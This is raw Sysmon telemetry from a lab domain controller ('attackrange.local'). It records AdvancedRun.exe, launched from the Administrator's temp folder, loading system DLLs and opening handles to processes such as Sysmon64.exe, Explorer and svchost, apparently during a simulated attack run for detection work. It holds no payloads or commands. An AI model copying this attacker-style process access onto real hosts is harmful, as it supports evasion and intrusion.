20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.127{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.127{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.124{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.124{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.123{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft 
Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.123{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.119{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.119{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.118{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User 
Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.118{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.116{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.115{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004079639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.114{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.112{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.109{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.108{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.921{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.921{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.919{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.919{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedR